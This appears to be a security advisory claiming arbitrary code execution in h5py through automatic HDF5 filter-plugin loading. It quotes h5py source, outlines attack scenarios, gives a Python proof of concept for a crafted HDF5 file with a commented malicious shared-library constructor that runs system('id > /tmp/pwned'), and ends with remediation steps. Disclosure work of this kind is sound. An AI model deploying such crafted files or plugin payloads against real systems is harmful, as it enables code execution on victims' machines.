# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py ## Target - **Project:** h5py/h5py - **URL:** https://github.com/h5py/h5py - **Component:** HDF5 filter pipeline / dataset read path - **CWE:** CWE-94 (Improper Control of Generation of Code / Code Injection) ## Severity: HIGH ## Summary When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (`.so`/`.dll`) filter plugin from directories in the plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs. ## Vulnerable Code ### File: `h5py/h5py/h5z.pyx` (lines 102-121) ```python @with_phil def register_filter(uintptr_t cls_pointer_address): '''(INT cls_pointer_address) => BOOL Register a new filter from the memory address of a buffer containing a ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter. `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic library:: import ctypes filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so") filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info()) ''' return H5Zregister(cls_pointer_address) >= 0 ``` ### File: `h5py/h5py/h5pl.pyx` (lines 20-25) ```python cpdef append(const char* search_path): """(STRING search_path) Add a directory to the end of the plugin search path. """ H5PLappend(search_path) ``` ### File: `h5py/h5py/_hl/filters.py` (lines 295-299) When a dataset is created with an integer filter ID, h5py passes it directly to HDF5: ```python elif isinstance(compression, int): if not allow_unknown_filter and not h5z.filter_avail(compression): raise ValueError("Unknown compression filter number: %s" % compression) plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts) ``` ### Automatic Plugin Loading (HDF5 library behavior) When `H5Dread()` is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers it automatically. This happens transparently inside: - `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)` - `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)` ## Exploitation ### Attack Scenario 1: Crafted HDF5 file + environment manipulation 1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration) 2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol 3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin 4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes ### Attack Scenario 2: h5pl API abuse in shared environments In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading: ```python import h5py # Attacker injects malicious plugin path h5py.h5pl.append(b'/attacker/controlled/path') # Later, when legitimate code reads a crafted HDF5 file: with h5py.File('crafted.h5', 'r') as f: data = f['dataset'][:] # Triggers plugin loading -> RCE ``` ### Proof of Concept ```python import h5py import numpy as np import struct import tempfile import os # Step 1: Create a malicious shared library (filter plugin) # In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code # For demonstration, this would be: # gcc -shared -o malicious_filter.so -fPIC malicious_filter.c # Where malicious_filter.c contains: # #include # void __attribute__((constructor)) init() { system("id > /tmp/pwned"); } # Step 2: Set plugin path os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins' # Step 3: Create HDF5 file with custom filter CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID with h5py.File('/tmp/crafted.h5', 'w') as f: # Use allow_unknown_filter to bypass availability check during creation f.create_dataset( 'payload', data=np.zeros(100), compression=CUSTOM_FILTER_ID, compression_opts=(0,), chunks=(100,), allow_unknown_filter=True ) # Step 4: When any user reads this file, the filter plugin is loaded with h5py.File('/tmp/crafted.h5', 'r') as f: data = f['payload'][:] # This triggers automatic plugin search and dlopen() ``` ## Impact - **Arbitrary code execution** in the context of the process reading the HDF5 file - This is particularly dangerous in: - Data science pipelines that process untrusted HDF5 files - ML model loading (Keras/TensorFlow models are stored as HDF5) - Scientific data sharing workflows - Jupyter notebook environments processing external data - h5py provides no mechanism to disable automatic filter plugin loading - The `allow_unknown_filter=True` parameter on dataset creation is designed for this workflow, explicitly supporting the use case ## Remediation 1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading. 2. **Add a security warning** in documentation about the risks of processing untrusted HDF5 files 3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in 4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()` ## References - HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html - HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins - h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline